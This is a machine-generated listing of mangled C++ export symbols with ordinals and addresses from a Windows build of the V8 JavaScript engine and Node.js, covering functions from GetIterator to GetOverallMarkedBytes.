                                                                                                                                                                                                        ?GetIterator@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z73080x140b15ed0
                                                                                                                                                                                                        ?GetJSCallArgCountParamIndex@Linkage@compiler@internal@v8@@SAHH@Z73090x1404bc120
                                                                                                                                                                                                        ?GetJSCallContextParamIndex@Linkage@compiler@internal@v8@@SAHH@Z73100x1404bc130
                                                                                                                                                                                                        ?GetJSCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@_NHV?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@@Z73110x140eab0b0
                                                                                                                                                                                                        ?GetJSCallNewTargetParamIndex@Linkage@compiler@internal@v8@@SAHH@Z73120x1402e7500
                                                                                                                                                                                                        ?GetJSContextParameter@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VContext@internal@v8@@@34@XZ73130x140f22b00
                                                                                                                                                                                                        ?GetJSCreateMap@NodeProperties@compiler@internal@v8@@SA?AV?$Optional@VMapRef@compiler@internal@v8@@@base@4@PEAVJSHeapBroker@234@PEAVNode@234@@Z73140x140eacc70
                                                                                                                                                                                                        ?GetJSEntryStubs@Isolate@v8@@QEAA?AUJSEntryStubs@2@XZ73150x140b15ee0
                                                                                                                                                                                                        ?GetJobFor@LazyCompileDispatcher@internal@v8@@AEBA?AV?$_Tree_const_iterator@V?$_Tree_val@U?$_Tree_simple_types@U?$pair@$$CB_KV?$unique_ptr@UJob@LazyCompileDispatcher@internal@v8@@U?$default_delete@UJob@LazyCompileDispatcher@internal@v8@@@std@@@std@@@std@@@std@@@std@@@std@@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z73160x140a7c8f0
                                                                                                                                                                                                        ?GetJumpTableOffset@NativeModule@wasm@internal@v8@@QEBAII@Z73170x14056bbc0
                                                                                                                                                                                                        ?GetJumpTableTargetOffsets@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVJumpTableTargetOffsets@234@XZ73180x140913900
                                                                                                                                                                                                        ?GetJumpTargetOffset@BytecodeArrayIterator@interpreter@internal@v8@@QEBAHXZ73190x140913a30
                                                                                                                                                                                                        ?GetJumpWithoutToBoolean@Bytecodes@interpreter@internal@v8@@SA?AW4Bytecode@234@W45234@@Z73200x1408f64e0
                                                                                                                                                                                                        ?GetKey@CallDescriptors@internal@v8@@SA?AW4Key@123@PEBVCallInterfaceDescriptorData@23@@Z73210x1404bc140
                                                                                                                                                                                                        ?GetKey@Descriptor@internal@v8@@QEBA?AV?$Handle@VName@internal@v8@@@23@XZ73220x14007a800
                                                                                                                                                                                                        ?GetKey@MapUpdater@internal@v8@@AEBA?AVName@23@VInternalIndex@23@@Z73230x140818850
                                                                                                                                                                                                        ?GetKey@TransitionsAccessor@internal@v8@@QEAA?AVName@23@H@Z73240x140484850
                                                                                                                                                                                                        ?GetKeyType@FeedbackNexus@internal@v8@@QEBA?AW4IcCheckType@23@XZ73250x14087b3d0
                                                                                                                                                                                                        ?GetKeyedAccessLoadMode@FeedbackNexus@internal@v8@@QEBA?AW4KeyedAccessLoadMode@23@XZ73260x14087b490
                                                                                                                                                                                                        ?GetKeyedAccessStoreMode@FeedbackNexus@internal@v8@@QEBA?AW4KeyedAccessStoreMode@23@XZ73270x14087b600
                                                                                                                                                                                                        ?GetKeyedStoreICSlotKind@FeedbackVectorSpec@internal@v8@@QEAA?AW4FeedbackSlotKind@23@W4LanguageMode@23@@Z73280x1404848e0
                                                                                                                                                                                                        ?GetKind@FeedbackMetadata@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@@Z73290x14087b8c0
                                                                                                                                                                                                        ?GetKind@FeedbackVector@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@@Z73300x14087b900
                                                                                                                                                                                                        ?GetKind@FeedbackVector@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@UAcquireLoadTag@3@@Z73310x14087b940
                                                                                                                                                                                                        ?GetKind@FeedbackVectorSpec@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@@Z73320x1404848f0
                                                                                                                                                                                                        ?GetLabel@CodeGenerator@compiler@internal@v8@@QEAAPEAVLabel@34@VRpoNumber@234@@Z73330x1404fef70
                                                                                                                                                                                                        ?GetLanguageMode@FeedbackNexus@internal@v8@@QEBA?AW4LanguageMode@23@XZ73340x140484920
                                                                                                                                                                                                        ?GetLastError@OS@base@v8@@SAHXZ73350x140e601c0
                                                                                                                                                                                                        ?GetLastFunctionLiteralId@?$ParserBase@VParser@internal@v8@@@internal@v8@@QEBAHXZ73360x140775120
                                                                                                                                                                                                        ?GetLineNumber@CpuProfileNode@v8@@QEBAHXZ73370x140744fd0
                                                                                                                                                                                                        ?GetLineNumber@JSMessageObject@internal@v8@@QEBAHXZ73380x1408378b0
                                                                                                                                                                                                        ?GetLineNumber@Location@debug@v8@@QEBAHXZ73390x140078ad0
                                                                                                                                                                                                        ?GetLineNumber@Location@v8@@QEAAHXZ73400x140078ad0
                                                                                                                                                                                                        ?GetLineNumber@Message@v8@@QEBA?AV?$Maybe@H@2@V?$Local@VContext@v8@@@2@@Z73410x140b16000
                                                                                                                                                                                                        ?GetLineNumber@Script@internal@v8@@SAHV?$Handle@VScript@internal@v8@@@23@H@Z73420x1407f9070
                                                                                                                                                                                                        ?GetLineNumber@StackFrame@v8@@QEBAHXZ73430x140b16180
                                                                                                                                                                                                        ?GetLineNumber@UnboundScript@v8@@QEAAHH@Z73440x140b16190
                                                                                                                                                                                                        ?GetLineTicks@CpuProfileNode@v8@@QEBA_NPEAULineTick@12@I@Z73450x140b162b0
                                                                                                                                                                                                        ?GetLineTicks@ProfileNode@internal@v8@@QEBA_NPEAULineTick@CpuProfileNode@3@I@Z73460x14074e690
                                                                                                                                                                                                        ?GetListOfBlocksRequiringSpillOperands@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVBitVector@34@PEBVTopTierRegisterAllocationData@234@@Z73470x140078eb0
                                                                                                                                                                                                        ?GetLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEAAAEAUBytecodeLiveness@234@H@Z73480x141096d30
                                                                                                                                                                                                        ?GetLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEBAAEBUBytecodeLiveness@234@H@Z73490x141096d30
                                                                                                                                                                                                        ?GetLoadedScripts@Debug@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@XZ73500x140a60e10
                                                                                                                                                                                                        ?GetLoadedScripts@debug@v8@@YAXPEAVIsolate@2@AEAV?$PersistentValueVector@VScript@debug@v8@@VDefaultPersistentValueVectorTraits@3@@2@@Z73510x140a6fc40
                                                                                                                                                                                                        ?GetLocalName@DebugInfo@wasm@internal@v8@@QEAA?AVWireBytesRef@234@HH@Z73520x140561620
                                                                                                                                                                                                        ?GetLocalOffsetFromOS@DateCache@internal@v8@@UEAAH_J_N@Z73530x140a79b40
                                                                                                                                                                                                        ?GetLocalValue@DebugInfo@wasm@internal@v8@@QEAA?AVWasmValue@234@H_K00PEAVIsolate@34@@Z73540x1405617e0
                                                                                                                                                                                                        ?GetLoopInfoFor@BytecodeAnalysis@compiler@internal@v8@@QEBAAEBULoopInfo@234@H@Z73550x141097d90
                                                                                                                                                                                                        ?GetLoopOffsetFor@BytecodeAnalysis@compiler@internal@v8@@QEBAHH@Z73560x141097dd0
                                                                                                                                                                                                        ?GetMachineSignature@CallDescriptor@compiler@internal@v8@@QEBAPEAV?$Signature@VMachineType@internal@v8@@@34@PEAVZone@34@@Z73570x140eab2b0
                                                                                                                                                                                                        ?GetMacroSourcePositionStack@CodeAssembler@compiler@internal@v8@@QEBAAEBV?$vector@U?$pair@PEBDH@std@@V?$allocator@U?$pair@PEBDH@std@@@2@@std@@XZ73580x140f22b40
                                                                                                                                                                                                        ?GetMainThreadHandle@LocalHandleScope@internal@v8@@CAPEA_KPEAVLocalHeap@23@_K@Z73590x1409f42d0
                                                                                                                                                                                                        ?GetMajor@Version@internal@v8@@SAHXZ73600x140528fb0
                                                                                                                                                                                                        ?GetMap@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73610x140484960
                                                                                                                                                                                                        ?GetMap@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73620x140484960
                                                                                                                                                                                                        ?GetMap@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73630x140484960
                                                                                                                                                                                                        ?GetMap@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73640x140484960
                                                                                                                                                                                                        ?GetMap@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73650x140484960
                                                                                                                                                                                                        ?GetMap@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73660x140484960
                                                                                                                                                                                                        ?GetMap@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73670x140484960
                                                                                                                                                                                                        ?GetMap@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73680x140484960
                                                                                                                                                                                                        ?GetMap@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73690x140484960
                                                                                                                                                                                                        ?GetMap@EphemeronHashTable@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73700x140484970
                                                                                                                                                                                                        ?GetMap@GlobalDictionary@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73710x140484980
                                                                                                                                                                                                        ?GetMap@NameDictionary@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73720x140484990
                                                                                                                                                                                                        ?GetMap@OrderedHashMap@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73730x1404849a0
                                                                                                                                                                                                        ?GetMap@OrderedHashSet@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73740x1404849b0
                                                                                                                                                                                                        ?GetMap@OrderedNameDictionary@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z73750x1404849c0
                                                                                                                                                                                                        ?GetMatch@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z73760x140b162c0
                                                                                                                                                                                                        ?GetMaterializedEquivalent@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@PEAV51234@@Z73770x1408f8320
                                                                                                                                                                                                        ?GetMaterializedEquivalentNotAccumulator@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@PEAV51234@@Z73780x1408f8350
                                                                                                                                                                                                        ?GetMaxAllocatedBytes@StatsScope@ZoneStats@compiler@internal@v8@@QEAA_KXZ73790x14104c820
                                                                                                                                                                                                        ?GetMaxAllocatedBytes@ZoneStats@compiler@internal@v8@@QEBA_KXZ73800x14104c850
                                                                                                                                                                                                        ?GetMaxChildCount@TopLevelLiveRange@compiler@internal@v8@@QEBAHXZ73810x140f13870
                                                                                                                                                                                                        ?GetMaxConcurrency@ConcurrentMarking@internal@v8@@AEAA_K_K@Z73820x1409ecc80
                                                                                                                                                                                                        ?GetMaxMemoryUsage@AccountingAllocator@internal@v8@@QEBA_KXZ73830x140078d20
                                                                                                                                                                                                        ?GetMaxSnapshotJSObjectId@HeapSnapshot@v8@@QEBAIXZ73840x14040f4f0
                                                                                                                                                                                                        ?GetMaxStringLength@JSNativeContextSpecialization@compiler@internal@v8@@SA?AV?$Optional@_K@base@4@PEAVJSHeapBroker@234@PEAVNode@234@@Z73850x14101b7c0
                                                                                                                                                                                                        ?GetMaximumFillToAlign@Heap@internal@v8@@SAHW4AllocationAlignment@23@@Z73860x1409b7620
                                                                                                                                                                                                        ?GetMetaTableField@SwissNameDictionary@internal@v8@@AEAAHH@Z73870x1404849d0
                                                                                                                                                                                                        ?GetMetricRecorder@CppHeap@internal@v8@@QEBAPEAVMetricRecorderAdapter@123@XZ73880x1409ea0f0
                                                                                                                                                                                                        ?GetMetricRecorder@StatsCollector@internal@cppgc@@QEBAPEAVMetricRecorder@23@XZ73890x14041b2a0
                                                                                                                                                                                                        ?GetMicrotaskQueue@Context@v8@@QEAAPEAVMicrotaskQueue@2@XZ73900x140b162d0
                                                                                                                                                                                                        ?GetMicrotasksPolicy@Isolate@v8@@QEBA?AW4MicrotasksPolicy@2@XZ73910x140b16360
                                                                                                                                                                                                        ?GetMicrotasksScopeDepth@MicrotaskQueue@internal@v8@@UEBAHXZ73920x1401df840
                                                                                                                                                                                                        ?GetMigrationTarget@TransitionsAccessor@internal@v8@@QEAA?AVMap@23@XZ73930x1407bc7d0
                                                                                                                                                                                                        ?GetMinor@Version@internal@v8@@SAHXZ73940x140529040
                                                                                                                                                                                                        ?GetMode@RelocIterator@internal@v8@@AEAA?AW4Mode@RelocInfo@23@XZ73950x140a80760
                                                                                                                                                                                                        ?GetModuleNamespace@Module@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ73960x140b16370
                                                                                                                                                                                                        ?GetModuleRequest@Module@v8@@QEBA?AV?$Local@VString@v8@@@2@H@Z73970x140b16430
                                                                                                                                                                                                        ?GetModuleRequestLocation@Module@v8@@QEBA?AVLocation@2@H@Z73980x140b16710
                                                                                                                                                                                                        ?GetModuleRequests@Module@v8@@QEBA?AV?$Local@VFixedArray@v8@@@2@XZ73990x140b16ab0
                                                                                                                                                                                                        ?GetModuleRequestsLength@Module@v8@@QEBAHXZ74000x140b16bd0
                                                                                                                                                                                                        ?GetMultiIsolatePlatform@node@@YAPEAVMultiIsolatePlatform@1@PEAVEnvironment@1@@Z74010x14028cad0
                                                                                                                                                                                                        ?GetMultiIsolatePlatform@node@@YAPEAVMultiIsolatePlatform@1@PEAVIsolateData@1@@Z74020x14028cae0
                                                                                                                                                                                                        ?GetMutable@GlobalGCInfoTable@internal@cppgc@@SAAEAVGCInfoTable@23@XZ74030x14044fda0
                                                                                                                                                                                                        ?GetName@CpuProfilesCollection@internal@v8@@QEAAPEBDVName@23@@Z74040x140744b30
                                                                                                                                                                                                        ?GetName@FeedbackNexus@internal@v8@@QEBA?AVName@23@XZ74050x14087b980
                                                                                                                                                                                                        ?GetName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ74060x140b16c70
                                                                                                                                                                                                        ?GetName@HeapGraphEdge@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ74070x140b16e10
                                                                                                                                                                                                        ?GetName@HeapGraphNode@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ74080x140b16f20
                                                                                                                                                                                                        ?GetName@HeapObjectHeader@internal@cppgc@@QEBA?AUHeapObjectName@23@XZ74090x140464b50
                                                                                                                                                                                                        ?GetName@LookupIterator@internal@v8@@QEAA?AV?$Handle@VName@internal@v8@@@23@XZ74100x140484a10
                                                                                                                                                                                                        ?GetName@ProfilerListener@internal@v8@@QEAAPEBDH@Z74110x1407453b0
                                                                                                                                                                                                        ?GetName@ProfilerListener@internal@v8@@QEAAPEBDPEBD@Z74120x1407453c0
                                                                                                                                                                                                        ?GetName@ProfilerListener@internal@v8@@QEAAPEBDV?$Vector@$$CBD@base@3@@Z74130x14074b930
                                                                                                                                                                                                        ?GetName@ProfilerListener@internal@v8@@QEAAPEBDVName@23@@Z74140x1407453d0
                                                                                                                                                                                                        ?GetName@StringsStorage@internal@v8@@QEAAPEBDH@Z74150x1407467c0
                                                                                                                                                                                                        ?GetName@StringsStorage@internal@v8@@QEAAPEBDVName@23@@Z74160x1407467d0
                                                                                                                                                                                                        ?GetNameFeedback@JSHeapBroker@compiler@internal@v8@@QEAA?AV?$Optional@VNameRef@compiler@internal@v8@@@base@4@AEBVFeedbackNexus@34@@Z74170x140f2eef0
                                                                                                                                                                                                        ?GetNameFromTypeSignature@NameTraitBase@internal@cppgc@@KA?AUHeapObjectName@23@PEBD@Z74180x140459960
                                                                                                                                                                                                        ?GetNameOrNull@ModuleWireBytes@wasm@internal@v8@@QEBA?AV?$Vector@$$CBD@base@4@PEBUWasmFunction@234@PEBUWasmModule@234@@Z74190x14053a410
                                                                                                                                                                                                        ?GetNameOrNull@ModuleWireBytes@wasm@internal@v8@@QEBA?AV?$Vector@$$CBD@base@4@VWireBytesRef@234@@Z74200x14053a480
                                                                                                                                                                                                        ?GetNativeContextIndexOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAIH@Z74210x140913850
                                                                                                                                                                                                        ?GetNativeFunctionTemplate@Extension@v8@@UEAA?AV?$Local@VFunctionTemplate@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z74220x140078e00
                                                                                                                                                                                                        ?GetNearCallTargetForFunction@NativeModule@wasm@internal@v8@@QEBA_KIAEBUJumpTablesRef@1234@@Z74230x14056bbf0
                                                                                                                                                                                                        ?GetNearRuntimeStubEntry@NativeModule@wasm@internal@v8@@QEBA_KW4RuntimeStubId@WasmCode@234@AEBUJumpTablesRef@1234@@Z74240x14056bc20
                                                                                                                                                                                                        ?GetNewPages@CompactionSpace@internal@v8@@QEAAAEBV?$vector@PEAVPage@internal@v8@@V?$allocator@PEAVPage@internal@v8@@@std@@@std@@XZ74250x140484b00
                                                                                                                                                                                                        ?GetNext@IndexGenerator@internal@v8@@QEAA?AV?$Optional@_K@base@3@XZ74260x1409a5f80
                                                                                                                                                                                                        ?GetNextByte@EhFrameIterator@internal@v8@@QEAAEXZ74270x1404afc80
                                                                                                                                                                                                        ?GetNextChildId@TopLevelLiveRange@compiler@internal@v8@@QEAAHXZ74280x140f13880
                                                                                                                                                                                                        ?GetNextFunctionLiteralId@?$ParserBase@VParser@internal@v8@@@internal@v8@@QEAAHXZ74290x140775130
                                                                                                                                                                                                        ?GetNextIncrementalStepDuration@IncrementalMarkingSchedule@internal@cppgc@@QEAA_K_K@Z74300x140461a90
                                                                                                                                                                                                        ?GetNextOpcode@EhFrameIterator@internal@v8@@QEAA?AW4DwarfOpcodes@EhFrameConstants@23@XZ74310x1404afc80
                                                                                                                                                                                                        ?GetNextSLeb128@EhFrameIterator@internal@v8@@QEAAHXZ74320x140a41480
                                                                                                                                                                                                        ?GetNextScriptId@Isolate@internal@v8@@QEAAHXZ74330x140a11dc0
                                                                                                                                                                                                        ?GetNextScriptId@LocalIsolate@internal@v8@@QEAAHXZ74340x140a08530
                                                                                                                                                                                                        ?GetNextSymbol@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ74350x140775140
                                                                                                                                                                                                        ?GetNextUInt16@EhFrameIterator@internal@v8@@QEAAGXZ74360x1404afc90
                                                                                                                                                                                                        ?GetNextUInt32@EhFrameIterator@internal@v8@@QEAAIXZ74370x1404afca0
                                                                                                                                                                                                        ?GetNextULeb128@EhFrameIterator@internal@v8@@QEAAIXZ74380x140a414d0
                                                                                                                                                                                                        ?GetNode@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@H@Z74390x140b16f90
                                                                                                                                                                                                        ?GetNodeById@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@I@Z74400x140b16fe0
                                                                                                                                                                                                        ?GetNodeForValues@StateValuesCache@compiler@internal@v8@@QEAAPEAVNode@234@PEAPEAV5234@_KPEBVBitVector@34@H@Z74410x140f574e0
                                                                                                                                                                                                        ?GetNodeId@CpuProfileNode@v8@@QEBAIXZ74420x1404ffc90
                                                                                                                                                                                                        ?GetNodeOrigin@NodeOriginTable@compiler@internal@v8@@QEBA?AVNodeOrigin@234@PEAVNode@234@@Z74430x140f6c730
                                                                                                                                                                                                        ?GetNodesCount@HeapSnapshot@v8@@QEBAHXZ74440x140b16ff0
                                                                                                                                                                                                        ?GetNonEvalDeclarationScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ74450x140af5650
                                                                                                                                                                                                        ?GetNumLocals@DebugInfo@wasm@internal@v8@@QEAAH_K@Z74460x1405619a0
                                                                                                                                                                                                        ?GetNumberAsSymbol@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ74470x140775150
                                                                                                                                                                                                        ?GetNumberOfCodeSpacesForTesting@NativeModule@wasm@internal@v8@@QEBA_KXZ74480x14056bc30
                                                                                                                                                                                                        ?GetNumberOfDataSlots@Isolate@v8@@SAIXZ74490x1400792d0
                                                                                                                                                                                                        ?GetNumberOfEmbedderDataFields@Context@v8@@QEAAIXZ74500x140b17000
                                                                                                                                                                                                        ?GetNumberOfRegistersRepresentedBy@Bytecodes@interpreter@internal@v8@@SAHW4OperandType@234@@Z74510x140484b10
                                                                                                                                                                                                        ?GetNumberOption@Intl@internal@v8@@SA?AV?$Maybe@H@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@HHH@Z74520x140871cd0
                                                                                                                                                                                                        ?GetObjectId@HeapProfiler@v8@@QEAAIPEAX@Z74530x140b170a0
                                                                                                                                                                                                        ?GetObjectId@HeapProfiler@v8@@QEAAIV?$Local@VValue@v8@@@2@@Z74540x140b170b0
                                                                                                                                                                                                        ?GetObjectIterator@LargeObjectSpace@internal@v8@@UEAA?AV?$unique_ptr@VObjectIterator@internal@v8@@U?$default_delete@VObjectIterator@internal@v8@@@std@@@std@@PEAVHeap@23@@Z74550x1409a5600
                                                                                                                                                                                                        ?GetObjectIterator@NewSpace@internal@v8@@UEAA?AV?$unique_ptr@VObjectIterator@internal@v8@@U?$default_delete@VObjectIterator@internal@v8@@@std@@@std@@PEAVHeap@23@@Z74560x14096f760
                                                                                                                                                                                                        ?GetObjectIterator@PagedSpace@internal@v8@@UEAA?AV?$unique_ptr@VObjectIterator@internal@v8@@U?$default_delete@VObjectIterator@internal@v8@@@std@@@std@@PEAVHeap@23@@Z74570x140964c70
                                                                                                                                                                                                        ?GetObjectProperty@Runtime@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@11PEA_N@Z74580x1406fb5d0
                                                                                                                                                                                                        ?GetObjectSizeForGarbageCollected@BaseObjectSizeTrait@internal@cppgc@@KA_KPEBX@Z74590x1404593a0
                                                                                                                                                                                                        ?GetObjectSizeForGarbageCollectedMixin@BaseObjectSizeTrait@internal@cppgc@@KA_KPEBX@Z74600x1404593d0
                                                                                                                                                                                                        ?GetOffsetToFirstUnusedStackSlot@CallDescriptor@compiler@internal@v8@@QEBAHXZ74610x140eab3e0
                                                                                                                                                                                                        ?GetOffsetToReturns@CallDescriptor@compiler@internal@v8@@QEBAHXZ74620x140eab490
                                                                                                                                                                                                        ?GetOneByteStringInternal@AstValueFactory@internal@v8@@AEAAPEBVAstRawString@23@V?$Vector@$$CBE@base@3@@Z74630x140b02c10
                                                                                                                                                                                                        ?GetOperandOffset@Bytecodes@interpreter@internal@v8@@SAHW4Bytecode@234@HW4OperandScale@234@@Z74640x1408f6530
                                                                                                                                                                                                        ?GetOperandSize@Bytecodes@interpreter@internal@v8@@SA?AW4OperandSize@234@W4Bytecode@234@HW4OperandScale@234@@Z74650x140484b90
                                                                                                                                                                                                        ?GetOperandSizes@Bytecodes@interpreter@internal@v8@@SAPEBW4OperandSize@234@W4Bytecode@234@W4OperandScale@234@@Z74660x140484bf0
                                                                                                                                                                                                        ?GetOperandType@Bytecodes@interpreter@internal@v8@@SA?AW4OperandType@234@W4Bytecode@234@H@Z74670x140484c10
                                                                                                                                                                                                        ?GetOperandTypes@Bytecodes@interpreter@internal@v8@@SAPEBW4OperandType@234@W4Bytecode@234@@Z74680x140484c30
                                                                                                                                                                                                        ?GetOptimizedCode@OSROptimizedCodeCache@internal@v8@@QEAA?AVCode@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@VBytecodeOffset@23@PEAVIsolate@23@@Z74690x1407dfd90
                                                                                                                                                                                                        ?GetOptimizedCodeForOSR@Compiler@internal@v8@@SA?AV?$MaybeHandle@VCode@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@VBytecodeOffset@23@PEAVJavaScriptFrame@23@@Z74700x140aabc70
                                                                                                                                                                                                        ?GetOrComputeFieldType@MapUpdater@internal@v8@@AEAA?AV?$Handle@VFieldType@internal@v8@@@23@V?$Handle@VDescriptorArray@internal@v8@@@23@VInternalIndex@23@W4PropertyLocation@23@VRepresentation@23@@Z74710x140818870
                                                                                                                                                                                                        ?GetOrComputeFieldType@MapUpdater@internal@v8@@AEBA?AV?$Handle@VFieldType@internal@v8@@@23@VInternalIndex@23@W4PropertyLocation@23@VRepresentation@23@@Z74720x140818950
                                                                                                                                                                                                        ?GetOrCreateAstValueFactory@ParseInfo@internal@v8@@QEAAPEAVAstValueFactory@23@XZ74730x1407b2b00
                                                                                                                                                                                                        ?GetOrCreateData@JSHeapBroker@compiler@internal@v8@@QEAAPEAVObjectData@234@V?$Handle@VObject@internal@v8@@@34@V?$Flags@W4GetOrCreateDataFlag@compiler@internal@v8@@H@base@4@@Z74740x140f2ef80
                                                                                                                                                                                                        ?GetOrCreateData@JSHeapBroker@compiler@internal@v8@@QEAAPEAVObjectData@234@VObject@34@V?$Flags@W4GetOrCreateDataFlag@compiler@internal@v8@@H@base@4@@Z74750x140f2ef90
                                                                                                                                                                                                        ?GetOrCreateDebugInfo@Debug@internal@v8@@QEAA?AV?$Handle@VDebugInfo@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z74760x140a61040
                                                                                                                                                                                                        ?GetOrCreateHash@Object@internal@v8@@QEAA?AVSmi@23@PEAVIsolate@23@@Z74770x1407f9250
                                                                                                                                                                                                        ?GetOrCreateIdentityHash@JSReceiver@internal@v8@@QEAA?AVSmi@23@PEAVIsolate@23@@Z74780x140837980
                                                                                                                                                                                                        ?GetOrCreateParallelMove@Instruction@compiler@internal@v8@@QEAAPEAVParallelMove@234@W4GapPosition@1234@PEAVZone@34@@Z74790x1404bc170
                                                                                                                                                                                                        ?GetOrCreateRegisterInfo@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@VRegister@234@@Z74800x1408f83b0
                                                                                                                                                                                                        ?GetOrCreateScript@WasmEngine@wasm@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@34@PEAVIsolate@34@AEBV?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@V?$Vector@$$CBD@base@4@@Z74810x140557500
                                                                                                                                                                                                        ?GetOrCreateTurboStatistics@WasmEngine@wasm@internal@v8@@QEAAPEAVCompilationStatistics@34@XZ74820x140557860
                                                                                                                                                                                                        ?GetOrCreateWasmExternalFunction@WasmInstanceObject@internal@v8@@SA?AV?$Handle@VWasmExternalFunction@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@H@Z74830x140530f10
                                                                                                                                                                                                        ?GetOrRegisterRecorderContextId@Isolate@internal@v8@@QEAA?AVContextId@Recorder@metrics@3@V?$Handle@VNativeContext@internal@v8@@@23@@Z74840x140a11e20
                                                                                                                                                                                                        ?GetOsrValueLocation@Linkage@compiler@internal@v8@@QEBA?AVLinkageLocation@234@H@Z74850x140eab4f0
                                                                                                                                                                                                        ?GetOutLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEAAPEAVBytecodeLivenessState@234@H@Z74860x140f95b20
                                                                                                                                                                                                        ?GetOutLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z74870x140f95b20
                                                                                                                                                                                                        ?GetOutLivenessFor@BytecodeAnalysis@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z74880x141097e40
                                                                                                                                                                                                        ?GetOuterContext@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@PEA_K@Z74890x140eacec0
                                                                                                                                                                                                        ?GetOuterFunctionSfi@BackgroundCompileTask@internal@v8@@QEAA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@@Z74900x140aac3c0
                                                                                                                                                                                                        ?GetOuterScopeWithContext@Scope@internal@v8@@QEAAPEAV123@XZ74910x140af5670
                                                                                                                                                                                                        ?GetOutputRegisterListOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegisterList@234@@Z74920x14091e450
                                                                                                                                                                                                        ?GetOutputRegisterOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegister@234@@Z74930x14091e490
                                                                                                                                                                                                        ?GetOutputStackFrameType@OptimizedCompilationInfo@internal@v8@@QEBA?AW4Type@StackFrame@23@XZ74940x140a829b0
                                                                                                                                                                                                        ?GetOverallMarkedBytes@IncrementalMarkingSchedule@internal@cppgc@@QEBA_KXZ74950x140461ba0
